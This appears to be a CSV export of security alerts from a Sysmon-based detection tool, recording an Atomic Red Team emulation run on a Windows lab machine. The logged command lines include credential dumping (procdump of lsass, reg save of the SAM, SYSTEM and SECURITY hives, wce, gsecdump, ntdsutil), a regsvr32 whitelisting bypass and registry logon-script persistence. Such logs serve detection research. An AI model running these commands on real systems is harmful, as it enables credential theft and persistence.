Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4049 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:54.968 + 747F3D96-D982-5D31-0000-0010DC633900 + 4240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4048 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.230 + 747F3D96-D97B-5D31-0000-0010F0F03800 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.958 + 747F3D96-DD9E-5D31-0000-00100C3F4B00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.875 + 747F3D96-DD9E-5D31-0000-00106D3A4B00 + 4208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.845 + 747F3D96-DD9E-5D31-0000-001059374B00 + 584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.673 + 747F3D96-DD9E-5D31-0000-00109A2F4B00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4123 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.535 + 747F3D96-DD9E-5D31-0000-0010CB274B00 + 3016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4121 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:23.302 + 747F3D96-DD9B-5D31-0000-00106C1C4B00 + 7164 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4119 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:21.069 + 747F3D96-DD99-5D31-0000-001069A34A00 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4117 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.211 + 747F3D96-DD95-5D31-0000-001075964A00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4116 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.139 + 747F3D96-DD95-5D31-0000-0010D6914A00 + 6264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4114 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.016 + 747F3D96-DD95-5D31-0000-0010148A4A00 + 5476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4111 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 15:11:03.652 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49744 + + false + 151.101.0.133 + + 